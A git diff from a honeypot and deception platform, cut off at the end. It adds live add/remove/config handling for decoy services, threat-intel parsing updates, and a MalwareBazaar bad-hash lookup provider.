+    """Re-push the host's full shard to its worker agent.
+
+    Uses the same code path as POST /swarm/deploy: load master state, filter
+    to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
+    The agent regenerates compose and recreates only the changed containers.
+    Idempotent for unchanged deckies.
+    """
+    from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
+
+    state = _load_state()
+    if state is None:
+        log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
+        return
+    config, _compose_path = state
+    host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
+    if not host_deckies:
+        log.warning(
+            "redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
+            host_uuid,
+        )
+        return
+    filtered = config.model_copy(update={"deckies": host_deckies})
+    await dispatch_decnet_config(filtered, repo)
+
+
+async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
+    """If the topology is agent-pinned, push the latest hydrated blob to the worker."""
+    from decnet.engine.deployer import resync_agent_topology
+
+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:
+        return
+    if not hydrated.get("topology", {}).get("target_host_uuid"):
+        return  # unihost topology — local compose is authoritative
+    await resync_agent_topology(repo, topology_id)
+
+
+log = get_logger("engine.services_live")
+
+DeckyKind = Literal["fleet", "topology"]
+
+
+class ServiceMutationError(ValueError):
+    """Raised for caller-correctable failures.  The API layer dispatches on
+    subclass to produce 4xx codes; base class maps to 422.
+    """
+
+
+class ServiceNotFoundError(ServiceMutationError):
+    """Decky or topology does not exist → 404."""
+
+
+class ServiceConflictError(ServiceMutationError):
+    """Idempotency violation (already on / not on) → 409."""
+
+
+def _validate_service_for_per_decky(name: str) -> BaseService:
+    """Return the registered service or raise ``ServiceMutationError``.
+
+    ``fleet_singleton`` services run once per fleet (e.g. an LLMNR
+    responder), not per-decky — we reject the per-decky add/remove
+    request rather than silently producing a no-op compose entry.
+    """
+    try:
+        svc = get_service(name)
+    except KeyError as exc:
+        raise ServiceMutationError(f"unknown service {name!r}") from exc
+    if svc.fleet_singleton:
+        raise ServiceMutationError(
+            f"service {name!r} is fleet_singleton; not addable per-decky"
+        )
+    return svc
+
+
+async def _publish(topic: str, payload: dict[str, Any]) -> None:
+    """Best-effort bus publish — same shape as the canary planter's helper."""
+    try:
+        bus = _get_bus()
+        await bus.connect()
+        await bus.publish(topic, payload)
+        await bus.close()
+    except Exception as e:  # noqa: BLE001
+        log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
+
+
+# ---------------------------------------------------------- topology path
+
+
+async def _topology_decky(
+    repo: BaseRepository, topology_id: str, decky_name: str,
+) -> dict[str, Any]:
+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:
+        raise ServiceNotFoundError(f"topology {topology_id!r} not found")
+    for d in hydrated["deckies"]:
+        cfg = d.get("decky_config") or {}
+        name = cfg.get("name") or d.get("name")
+        if name == decky_name:
+            return d
+    raise ServiceNotFoundError(
+        f"decky {decky_name!r} is not in topology {topology_id!r}"
+    )
+
+
+async def _rerender_topology_compose(
+    repo: BaseRepository, topology_id: str,
+) -> Path:
+    """Re-hydrate + re-render the per-topology compose file.
+
+    Called after a successful DB update so future deploys reflect the
+    change; without this the file would still describe the old service
+    set and a subsequent ``up -d`` would resurrect the removed service.
+    """
+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:  # pragma: no cover — narrow race
+        raise ServiceNotFoundError(
+            f"topology {topology_id!r} disappeared mid-mutation"
+        )
+    path = _topology_compose_path(topology_id)
+    _write_topology_compose(hydrated, path)
+    return path
+
+
+async def _add_topology_service(
+    repo: BaseRepository,
+    topology_id: str,
+    decky_name: str,
+    service_name: str,
+    initial_config: dict | None = None,
+) -> list[str]:
+    decky = await _topology_decky(repo, topology_id, decky_name)
+    services: list[str] = list(decky.get("services") or [])
+    if service_name in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} already on decky {decky_name!r}"
+        )
+    services.append(service_name)
+    update: dict[str, Any] = {"services": services}
+    # If the caller supplied initial config, fold it into decky_config
+    # BEFORE compose regen so the first ``up`` materialises the env on
+    # the new container — no follow-up apply needed.
+    if initial_config:
+        cfg_blob = dict(decky.get("decky_config") or {})
+        sc = dict(cfg_blob.get("service_config") or {})
+        sc[service_name] = initial_config
+        cfg_blob["service_config"] = sc
+        update["decky_config"] = cfg_blob
+    await repo.update_topology_decky(decky["uuid"], update)
+
+    compose_path = await _rerender_topology_compose(repo, topology_id)
+    if await _topology_is_agent_pinned(repo, topology_id):
+        # Agent-pinned: the master's local compose has nothing to up.
+        # Push the new hydrated blob to the worker.
+        await _resync_agent_topology(repo, topology_id)
+    else:
+        target = f"{decky_name}-{service_name}"
+        # Run compose in a worker thread so the API event loop stays
+        # responsive — same pattern as engine/deployer.deploy_topology.
+        await anyio.to_thread.run_sync(
+            lambda: _compose(
+                "up", "-d", "--no-deps", "--build", target,
+                compose_file=compose_path,
+            ),
+        )
+    return services
+
+
+async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
+    hydrated = await hydrate(repo, topology_id)
+    if hydrated is None:
+        return False
+    return bool(hydrated.get("topology", {}).get("target_host_uuid"))
+
+
+async def _remove_topology_service(
+    repo: BaseRepository,
+    topology_id: str,
+    decky_name: str,
+    service_name: str,
+) -> list[str]:
+    decky = await _topology_decky(repo, topology_id, decky_name)
+    services: list[str] = list(decky.get("services") or [])
+    if service_name not in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+    services = [s for s in services if s != service_name]
+    target = f"{decky_name}-{service_name}"
+    compose_path = _topology_compose_path(topology_id)
+    agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
+    if not agent_pinned:
+        # Stop + rm before persisting + re-rendering so a half-completed
+        # mutation leaves the operator a clear state to retry from
+        # (container still running; DB still says service is on).
+        await anyio.to_thread.run_sync(
+            lambda: _compose("stop", target, compose_file=compose_path),
+        )
+        await anyio.to_thread.run_sync(
+            lambda: _compose("rm", "-f", target, compose_file=compose_path),
+        )
+    await repo.update_topology_decky(decky["uuid"], {"services": services})
+    await _rerender_topology_compose(repo, topology_id)
+    if agent_pinned:
+        # Worker tears down the removed service when it diffs the
+        # incoming hydrated blob against its current state.
+        await _resync_agent_topology(repo, topology_id)
+    return services
+
+
+# ---------------------------------------------------------- fleet path
+
+
+def _fleet_state_or_raise() -> tuple[Any, Path]:
+    state = _load_state()
+    if state is None:
+        raise ServiceMutationError(
+            "no fleet state on disk — run `decnet up` first"
+        )
+    return state
+
+
+def _fleet_find_decky(config: Any, decky_name: str) -> Any:
+    for d in config.deckies:
+        if d.name == decky_name:
+            return d
+    raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
+
+
+async def _persist_fleet_change(
+    repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
+) -> None:
+    """Persist the mutation to JSON state, compose file, and the DB row."""
+    config, _ = _load_state()
+    target = _fleet_find_decky(config, decky.name)
+    target.services = services
+    _save_state(config, compose_path)
+    _write_compose(config, compose_path)
+    # Mirror to the DB row so DB-only consumers (dashboard, API) see the
+    # change without waiting for the reconciler.
+    from decnet.web.db.models import LOCAL_HOST_SENTINEL
+    await repo.upsert_fleet_decky({
+        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
+        "name": decky.name,
+        "services": services,
+        "decky_config": target.model_dump(mode="json"),
+        "decky_ip": decky.ip,
+        "state": "running",
+    })
+
+
+async def _add_fleet_service(
+    repo: BaseRepository,
+    decky_name: str,
+    service_name: str,
+    initial_config: dict | None = None,
+) -> list[str]:
+    config, compose_path = _fleet_state_or_raise()
+    decky = _fleet_find_decky(config, decky_name)
+    services: list[str] = list(decky.services or [])
+    if service_name in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} already on decky {decky_name!r}"
+        )
+    services.append(service_name)
+    if initial_config:
+        # Same path as _update_fleet_service_config: stash the validated
+        # cfg on the decky model so the compose write picks it up.
+        sc = dict(getattr(decky, "service_config", None) or {})
+        sc[service_name] = initial_config
+        decky.service_config = sc
+    await _persist_fleet_change(repo, decky, services, compose_path)
+    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
+    if swarm_host_uuid:
+        # Master has no container for this decky — re-push the host's
+        # shard so the worker materialises the new service.
+        await _redispatch_fleet_shard(repo, swarm_host_uuid)
+    else:
+        target = f"{decky_name}-{service_name}"
+        await anyio.to_thread.run_sync(
+            lambda: _compose(
+                "up", "-d", "--no-deps", "--build", target,
+                compose_file=compose_path,
+            ),
+        )
+    return services
+
+
+async def _remove_fleet_service(
+    repo: BaseRepository, decky_name: str, service_name: str,
+) -> list[str]:
+    config, compose_path = _fleet_state_or_raise()
+    decky = _fleet_find_decky(config, decky_name)
+    services: list[str] = list(decky.services or [])
+    if service_name not in services:
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+    services = [s for s in services if s != service_name]
+    target = f"{decky_name}-{service_name}"
+    swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
+    if not swarm_host_uuid:
+        # Local: stop+rm before persist so the operator has a clear retry
+        # state if compose fails halfway. Swarm: skip — the worker's compose
+        # will handle the removal when the redispatched config drops the
+        # service from the decky.
+        await anyio.to_thread.run_sync(
+            lambda: _compose("stop", target, compose_file=compose_path),
+        )
+        await anyio.to_thread.run_sync(
+            lambda: _compose("rm", "-f", target, compose_file=compose_path),
+        )
+    await _persist_fleet_change(repo, decky, services, compose_path)
+    if swarm_host_uuid:
+        await _redispatch_fleet_shard(repo, swarm_host_uuid)
+    return services
+
+
+# ---------------------------------------------------------- public api
+
+
+async def add_service(
+    repo: BaseRepository,
+    *,
+    decky_kind: DeckyKind,
+    decky_name: str,
+    service_name: str,
+    topology_id: Optional[str] = None,
+    config: dict | None = None,
+) -> list[str]:
+    """Add *service_name* to a deployed decky.
+
+    Validates the service registry (rejects unknown / fleet_singleton
+    names) and the optional ``config`` against the service's schema,
+    persists the change, regenerates the compose file, runs
+    ``up -d --no-deps --build <decky>-<service>`` in a worker thread,
+    and publishes ``decky.<name>.service.added`` on the bus.
+
+    ``config`` is the same dict shape PUT/POST .../config accepts; it's
+    coerced via ``BaseService.validate_cfg`` before any state write so
+    a 400-class failure leaves zero side-effects.
+
+    Returns the post-mutation services list.
+    """
+    svc = _validate_service_for_per_decky(service_name)
+    initial_config = svc.validate_cfg(config) if config else {}
+    if decky_kind == "topology":
+        if not topology_id:
+            raise ServiceMutationError(
+                "decky_kind=topology requires topology_id",
+            )
+        services = await _add_topology_service(
+            repo, topology_id, decky_name, service_name,
+            initial_config=initial_config,
+        )
+    elif decky_kind == "fleet":
+        services = await _add_fleet_service(
+            repo, decky_name, service_name,
+            initial_config=initial_config,
+        )
+    else:  # pragma: no cover — Literal narrows
+        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
+
+    await _publish(
+        topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
+        {
+            "decky_name": decky_name,
+            "service_name": service_name,
+            "topology_id": topology_id,
+            "services": services,
+        },
+    )
+    log.info(
+        "services_live.add decky=%s topology=%s service=%s",
+        decky_name, topology_id, service_name,
+    )
+    return services
+
+
+async def update_service_config(
+    repo: BaseRepository,
+    *,
+    decky_kind: DeckyKind,
+    decky_name: str,
+    service_name: str,
+    cfg: dict,
+    apply: bool = False,
+    topology_id: Optional[str] = None,
+) -> dict:
+    """Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
+
+    The submitted dict is validated against the service's
+    ``config_schema`` (unknown keys dropped, types coerced) BEFORE any
+    DB write, so a 400-class failure leaves zero side-effects.
+
+    ``apply=False`` (Save):  only the DB row + compose file are updated.
+                             The running container keeps its old env.
+    ``apply=True``  (Apply): same persistence, then a force-recreate of
+                             ``<decky>-<service>`` so the container picks
+                             up the new env.  Destructive: drops any
+                             in-container session state on that service.
+
+    Returns the post-mutation validated cfg.
+    """
+    svc = _validate_service_for_per_decky(service_name)
+    validated = svc.validate_cfg(cfg)
+    if decky_kind == "topology":
+        if not topology_id:
+            raise ServiceMutationError(
+                "decky_kind=topology requires topology_id",
+            )
+        await _update_topology_service_config(
+            repo, topology_id, decky_name, service_name, validated, apply=apply,
+        )
+    elif decky_kind == "fleet":
+        await _update_fleet_service_config(
+            repo, decky_name, service_name, validated, apply=apply,
+        )
+    else:  # pragma: no cover
+        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
+
+    await _publish(
+        topics.decky(decky_name, topics.DECKY_SERVICE_CONFIG_CHANGED),
+        {
+            "decky_name": decky_name,
+            "service_name": service_name,
+            "topology_id": topology_id,
+            "service_config": validated,
+            "recreated": bool(apply),
+        },
+    )
+    log.info(
+        "services_live.update_config decky=%s topology=%s service=%s apply=%s",
+        decky_name, topology_id, service_name, apply,
+    )
+    return validated
+
+
+async def _update_topology_service_config(
+    repo: BaseRepository,
+    topology_id: str,
+    decky_name: str,
+    service_name: str,
+    validated: dict,
+    *,
+    apply: bool,
+) -> None:
+    decky = await _topology_decky(repo, topology_id, decky_name)
+    if service_name not in (decky.get("services") or []):
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+    cfg_blob = dict(decky.get("decky_config") or {})
+    sc = dict(cfg_blob.get("service_config") or {})
+    sc[service_name] = validated
+    cfg_blob["service_config"] = sc
+    await repo.update_topology_decky(decky["uuid"], {"decky_config": cfg_blob})
+    compose_path = await _rerender_topology_compose(repo, topology_id)
+    if apply:
+        if await _topology_is_agent_pinned(repo, topology_id):
+            await _resync_agent_topology(repo, topology_id)
+        else:
+            target = f"{decky_name}-{service_name}"
+            await anyio.to_thread.run_sync(
+                lambda: _compose(
+                    "up", "-d", "--no-deps", "--force-recreate", "--build", target,
+                    compose_file=compose_path,
+                ),
+            )
+
+
+async def _update_fleet_service_config(
+    repo: BaseRepository,
+    decky_name: str,
+    service_name: str,
+    validated: dict,
+    *,
+    apply: bool,
+) -> None:
+    config, compose_path = _fleet_state_or_raise()
+    decky = _fleet_find_decky(config, decky_name)
+    if service_name not in (decky.services or []):
+        raise ServiceConflictError(
+            f"service {service_name!r} not on decky {decky_name!r}"
+        )
+    sc = dict(getattr(decky, "service_config", None) or {})
+    sc[service_name] = validated
+    decky.service_config = sc
+    _save_state(config, compose_path)
+    _write_compose(config, compose_path)
+    from decnet.web.db.models import LOCAL_HOST_SENTINEL
+    await repo.upsert_fleet_decky({
+        "host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
+        "name": decky.name,
+        "services": list(decky.services or []),
+        "decky_config": decky.model_dump(mode="json"),
+        "decky_ip": decky.ip,
+        "state": "running",
+    })
+    if apply:
+        swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
+        if swarm_host_uuid:
+            await _redispatch_fleet_shard(repo, swarm_host_uuid)
+        else:
+            target = f"{decky_name}-{service_name}"
+            # Docker Compose tracks the previous container by ID. If that
+            # container was already removed (or renamed during a prior failed
+            # deploy), --force-recreate fails with "No such container". Pre-
+            # remove by name so Compose starts from a clean slate.
+            await anyio.to_thread.run_sync(
+                lambda: subprocess.run(  # nosec B603 B607
+                    ["docker", "rm", "-f", target],
+                    capture_output=True,
+                ),
+            )
+            await anyio.to_thread.run_sync(
+                lambda: _compose(
+                    "up", "-d", "--no-deps", "--force-recreate", "--build", target,
+                    compose_file=compose_path,
+                ),
+            )
+
+
+async def remove_service(
+    repo: BaseRepository,
+    *,
+    decky_kind: DeckyKind,
+    decky_name: str,
+    service_name: str,
+    topology_id: Optional[str] = None,
+) -> list[str]:
+    """Remove *service_name* from a deployed decky.
+
+    Stops + removes the service container, persists the new services
+    list, re-renders the compose file (so the next ``up -d`` doesn't
+    bring it back), and publishes ``decky.<name>.service.removed``.
+
+    Returns the post-mutation services list.
+    """
+    if decky_kind == "topology":
+        if not topology_id:
+            raise ServiceMutationError(
+                "decky_kind=topology requires topology_id",
+            )
+        services = await _remove_topology_service(
+            repo, topology_id, decky_name, service_name,
+        )
+    elif decky_kind == "fleet":
+        services = await _remove_fleet_service(repo, decky_name, service_name)
+    else:  # pragma: no cover
+        raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
+
+    await _publish(
+        topics.decky(decky_name, topics.DECKY_SERVICE_REMOVED),
+        {
+            "decky_name": decky_name,
+            "service_name": service_name,
+            "topology_id": topology_id,
+            "services": services,
+        },
+    )
+    log.info(
+        "services_live.remove decky=%s topology=%s service=%s",
+        decky_name, topology_id, service_name,
+    )
+    return services
--- a/decnet/env.py
+++ b/decnet/env.py
@@ -91,7 +91,7 @@ DECNET_API_PORT: int = _port("DECNET_API_PORT", 8000)
 # DECNET_JWT_SECRET is resolved lazily via module __getattr__ so that agent /
 # updater / swarmctl subcommands (which never touch auth) can start without
 # the master's JWT secret being present in the environment.
-DECNET_INGEST_LOG_FILE: str | None = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")
+DECNET_INGEST_LOG_FILE: str = os.environ.get("DECNET_INGEST_LOG_FILE", "/var/log/decnet/decnet.log")

 # Agent-side RFC 5424 sink written by decnet.collector.worker when run on
 # a SWARM worker.  The forwarder tails this file and ships lines over
@@ -114,6 +114,11 @@ DECNET_SWARM_MASTER_HOST: str | None = os.environ.get("DECNET_SWARM_MASTER_HOST"
 DECNET_HOST_UUID: str | None = os.environ.get("DECNET_HOST_UUID")
 DECNET_MASTER_HOST: str | None = os.environ.get("DECNET_MASTER_HOST")
 DECNET_SWARMCTL_PORT: int = _port("DECNET_SWARMCTL_PORT", 8770)
+# Bind address for the master-side swarm controller. Loopback by default —
+# operators flip to 0.0.0.0 (or a specific NIC) on production masters where
+# workers heartbeat in over mTLS from other hosts. Seeded by [swarm]
+# swarmctl-host in /etc/decnet/decnet.ini.
+DECNET_SWARMCTL_HOST: str = os.environ.get("DECNET_SWARMCTL_HOST", "127.0.0.1")

 # Ingester batching: how many log rows to accumulate per commit, and the
 # max wait (ms) before flushing a partial batch. Larger batches reduce
--- a/decnet/fleet/reconciler.py
+++ b/decnet/fleet/reconciler.py
@@ -128,8 +128,6 @@ async def reconcile_once(
    container_states = await asyncio.to_thread(
        _collect_container_states, docker_client_factory,
    )
-    docker_known = container_states is not None
-
    json_names = {d.name for d in json_deckies}

    # 1. INSERT: present in JSON, absent from DB.
@@ -138,7 +136,7 @@ async def reconcile_once(
            continue
        new_state = (
            _aggregate_decky_state(d.name, list(d.services), container_states)
-            if docker_known else "running"
+            if container_states is not None else "running"
        )
        row_host = d.host_uuid or host_uuid
        await repo.upsert_fleet_decky({
@@ -168,7 +166,7 @@ async def reconcile_once(
            )

    # 3. STATE: present in both, docker says something fresh.
-    if docker_known:
+    if container_states is not None:
        for d in json_deckies:
            existing = db_by_name.get(d.name)
            if existing is None:
--- a/decnet/geoip/rir/provider.py
+++ b/decnet/geoip/rir/provider.py
@@ -9,7 +9,7 @@ from decnet.geoip.base import Provider
 from decnet.geoip.lookup import Lookup
 from decnet.geoip.paths import ensure_root
 from decnet.geoip.rir.fetch import RIR_SOURCES, fetch_all
-from decnet.geoip.rir.parse import parse_file
+from decnet.geoip.rir.parse import Range, parse_file

 logger = logging.getLogger("decnet.geoip.rir.provider")

@@ -45,7 +45,7 @@ class RirProvider(Provider):
            except Exception as exc:
                logger.warning("geoip.rir: cache load failed, rebuilding: %s", exc)

-        ranges = []
+        ranges: list[Range] = []
        for path in self.data_paths():
            if not path.exists():
                continue
--- a/decnet/intel/abuseipdb.py
+++ b/decnet/intel/abuseipdb.py
@@ -17,7 +17,6 @@ later if operators report drift.
 """
 from __future__ import annotations

-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -93,12 +92,25 @@ class AbuseIPDBProvider(IntelProvider):
        data = payload.get("data") or {}
        score = int(data.get("abuseConfidenceScore") or 0)
        verdict = _score_to_verdict(score)
+        # AbuseIPDB returns ``data.reports[*].categories`` — a list of
+        # int codes per report. Flatten the union across all recent
+        # reports so the IntelLifter sees the full activity profile,
+        # not just the most-recent report's categories. Sorted for
+        # determinism (matters for tests + for the bus payload diff).
+        categories: set[int] = set()
+        for report in data.get("reports") or []:
+            if not isinstance(report, dict):
+                continue
+            for cat in report.get("categories") or []:
+                if isinstance(cat, int):
+                    categories.add(cat)
        return IntelResult(
            provider=self.name,
            verdict=verdict,
            column_updates={
                "abuseipdb_score": score,
-                "abuseipdb_raw": json.dumps(data),
+                "abuseipdb_categories": sorted(categories),
+                "abuseipdb_raw": data,
                "abuseipdb_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/base.py
+++ b/decnet/intel/base.py
@@ -78,3 +78,33 @@ class IntelProvider(ABC):
        entire IP. Implementations should also respect
        ``self._semaphore`` to bound in-flight calls.
        """
+
+
+class MalHashProvider(ABC):
+    """Abstract bad-hash lookup provider.
+
+    Sibling to :class:`IntelProvider` — different keyspace (file SHA-256
+    vs IP), different consumer (the email ingester at observation time,
+    not the IP-keyed intel-worker fan-out). Kept as a separate ABC so
+    the ``lookup(ip)`` semantics on ``IntelProvider`` stay honest.
+
+    Concrete impls today:
+
+    * :class:`decnet.intel.mal_hash.MalwareBazaarProvider` — bulk-feed
+      shape mirroring :class:`decnet.intel.feodo.FeodoProvider`.
+
+    Future impls (paid VirusTotal subscription, in-house allowlist) plug
+    in behind the same factory in :func:`decnet.intel.factory.get_mal_hash_provider`.
+    """
+
+    name: str
+
+    @abstractmethod
+    async def is_known_bad(self, sha256: str) -> bool:
+        """Return whether *sha256* is on this provider's bad-hash list.
+
+        MUST NOT raise — return ``False`` on any error (the caller is the
+        ingester, not a worker; an exception here would taint a totally
+        unrelated bus payload). The provider is responsible for logging
+        its own errors.
+        """
--- a/decnet/intel/factory.py
+++ b/decnet/intel/factory.py
@@ -21,7 +21,7 @@ from __future__ import annotations
 import os
 from typing import List

-from decnet.intel.base import IntelProvider
+from decnet.intel.base import IntelProvider, MalHashProvider

 _KNOWN_PROVIDERS = ("greynoise", "abuseipdb", "feodo", "threatfox")

@@ -37,6 +37,40 @@ def _provider_list() -> list[str]:
    return [p.strip().lower() for p in raw.split(",") if p.strip()]


+_mal_hash_singleton: MalHashProvider | None = None
+_mal_hash_initialized: bool = False
+
+
+def get_mal_hash_provider() -> MalHashProvider | None:
+    """Return the configured malware-hash lookup provider singleton.
+
+    Sibling factory to :func:`get_intel_providers` — different keyspace
+    (file SHA-256 vs IP), different consumer (the email ingester at
+    observation time, not the IP-keyed intel-worker fan-out). Returns
+    ``None`` only if intel is disabled wholesale; otherwise returns a
+    provider whose :meth:`is_known_bad` self-disables to a no-op when
+    ``DECNET_MALWAREBAZAAR_AUTH_KEY`` is unset, so the ingester never
+    has to special-case "no provider configured."
+    """
+    global _mal_hash_singleton, _mal_hash_initialized
+    if _mal_hash_initialized:
+        return _mal_hash_singleton
+    _mal_hash_initialized = True
+    if not _enabled():
+        _mal_hash_singleton = None
+        return None
+    from decnet.intel.mal_hash import MalwareBazaarProvider
+    _mal_hash_singleton = MalwareBazaarProvider()
+    return _mal_hash_singleton
+
+
+def _reset_mal_hash_provider_for_testing() -> None:
+    """Test hook — drop the singleton so the next call re-reads env."""
+    global _mal_hash_singleton, _mal_hash_initialized
+    _mal_hash_singleton = None
+    _mal_hash_initialized = False
+
+
 def get_intel_providers() -> List[IntelProvider]:
    """Return the configured threat-intel providers.

--- a/decnet/intel/feodo.py
+++ b/decnet/intel/feodo.py
@@ -13,7 +13,6 @@ of attacker IPs map to a single network round-trip per refresh window.
 """
 from __future__ import annotations

-import json
 import time
 from datetime import datetime, timezone
 from typing import Any, Optional
@@ -93,16 +92,22 @@ class FeodoProvider(IntelProvider):
                verdict=None,  # absence ≠ "benign", let other providers speak
                column_updates={
                    "feodo_listed": False,
-                    "feodo_raw": "{}",
+                    "feodo_malware_family": None,
+                    "feodo_raw": {},
                    "feodo_queried_at": datetime.now(timezone.utc),
                },
            )
+        family_obj = entry.get("malware")
+        family = (
+            family_obj if isinstance(family_obj, str) and family_obj else None
+        )
        return IntelResult(
            provider=self.name,
            verdict="malicious",
            column_updates={
                "feodo_listed": True,
-                "feodo_raw": json.dumps(entry),
+                "feodo_malware_family": family,
+                "feodo_raw": entry,
                "feodo_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/greynoise.py
+++ b/decnet/intel/greynoise.py
@@ -25,7 +25,6 @@ Status code semantics:
 """
 from __future__ import annotations

-import json
 import os
 from datetime import datetime, timezone
 from typing import Optional
@@ -71,7 +70,9 @@ class GreyNoiseProvider(IntelProvider):
                verdict="unknown",
                column_updates={
                    "greynoise_classification": "unknown",
-                    "greynoise_raw": json.dumps({"message": "not seen"}),
+                    "greynoise_name": None,
+                    "greynoise_tags": [],
+                    "greynoise_raw": {"message": "not seen"},
                    "greynoise_queried_at": datetime.now(timezone.utc),
                },
            )
@@ -88,12 +89,25 @@ class GreyNoiseProvider(IntelProvider):

        classification = (data.get("classification") or "unknown").lower()
        verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
+        # The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
+        # "Censys") but no behavioral tag list — the tag taxonomy is
+        # paid-tier only. Persist whatever we got; a future non-Community
+        # provider may populate ``greynoise_tags``.
+        name_obj = data.get("name")
+        name = name_obj if isinstance(name_obj, str) and name_obj else None
+        tags_obj = data.get("tags")
+        tags: list[str] = (
+            [t for t in tags_obj if isinstance(t, str)]
+            if isinstance(tags_obj, list) else []
+        )
        return IntelResult(
            provider=self.name,
            verdict=verdict,
            column_updates={
                "greynoise_classification": classification,
-                "greynoise_raw": json.dumps(data),
+                "greynoise_name": name,
+                "greynoise_tags": tags,
+                "greynoise_raw": data,
                "greynoise_queried_at": datetime.now(timezone.utc),
            },
        )
--- a/decnet/intel/mal_hash.py
+++ b/decnet/intel/mal_hash.py
@@ -0,0 +1,195 @@
+"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
+
+Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
+shape, but operates on the SHA-256 keyspace instead of IPs and so
+implements :class:`decnet.intel.base.MalHashProvider` rather than
+:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
+
+Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
+``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
+sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
+30 MB resident as a ``set[str]`` of hex-lowercased hashes.
+
+Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
+the provider logs one warning at first refresh attempt and disables
+itself for the process lifetime — :meth:`is_known_bad` returns ``False``
+without ever making a network call. The ingester treats that the same
+as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
+bus payload (which is exactly what the predicate's ``is True`` check
+does today, so the silent-no-op is behaviorally identical to "lane not
+shipped yet").
+"""
+from __future__ import annotations
+
+import csv
+import io
+import os
+import time
+import zipfile
+from typing import Optional
+
+from decnet.intel.base import MalHashProvider
+from decnet.logging import get_logger
+from decnet.net.http import stealth_client
+
+log = get_logger("intel.mal_hash")
+
+_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
+_DEFAULT_REFRESH_S = 86_400.0  # 24h — feed is daily, no need to hammer
+_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
+_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
+
+
+def _read_refresh_interval() -> float:
+    raw = os.environ.get(_REFRESH_INTERVAL_ENV)
+    if raw is None:
+        return _DEFAULT_REFRESH_S
+    try:
+        return float(raw)
+    except ValueError:
+        log.warning(
+            "%s=%r not a float; falling back to default %.0f",
+            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
+        )
+        return _DEFAULT_REFRESH_S
+
+
+class MalwareBazaarProvider(MalHashProvider):
+    """Bulk SHA-256 lookup against MalwareBazaar's full export."""
+
+    name = "malwarebazaar"
+
+    def __init__(
+        self,
+        *,
+        auth_key: Optional[str] = None,
+        refresh_interval_s: Optional[float] = None,
+    ) -> None:
+        self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
+        self._refresh_interval_s = (
+            refresh_interval_s
+            if refresh_interval_s is not None
+            else _read_refresh_interval()
+        )
+        self._known: set[str] = set()
+        self._loaded_at: float = 0.0
+        self._last_error: Optional[str] = None
+        self._disabled_warned: bool = False
+
+    @property
+    def disabled(self) -> bool:
+        return self._auth_key is None
+
+    async def _refresh(self) -> Optional[str]:
+        """Refetch the bulk feed. Returns an error string or ``None``."""
+        if self._auth_key is None:
+            return "no auth key"
+        try:
+            async with stealth_client(timeout=60.0) as client:
+                resp = await client.get(
+                    _ENDPOINT, headers={"Auth-Key": self._auth_key},
+                )
+        except Exception as exc:  # noqa: BLE001
+            return f"network: {exc}"
+        if resp.status_code != 200:
+            return f"HTTP {resp.status_code}"
+        body = resp.content
+        try:
+            new_known = _parse_dump(body)
+        except Exception as exc:  # noqa: BLE001
+            return f"parse: {exc}"
+        if not new_known:
+            return "feed: empty"
+        self._known = new_known
+        self._loaded_at = time.monotonic()
+        self._last_error = None
+        log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
+        return None
+
+    async def _ensure_fresh(self) -> None:
+        if self.disabled:
+            if not self._disabled_warned:
+                log.warning(
+                    "R0046 mal_hash_match disabled: %s unset",
+                    _AUTH_KEY_ENV,
+                )
+                self._disabled_warned = True
+            return
+        if (
+            not self._known
+            or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
+        ):
+            err = await self._refresh()
+            if err:
+                self._last_error = err
+                log.warning("malwarebazaar refresh failed: %s", err)
+
+    async def is_known_bad(self, sha256: str) -> bool:
+        if self.disabled:
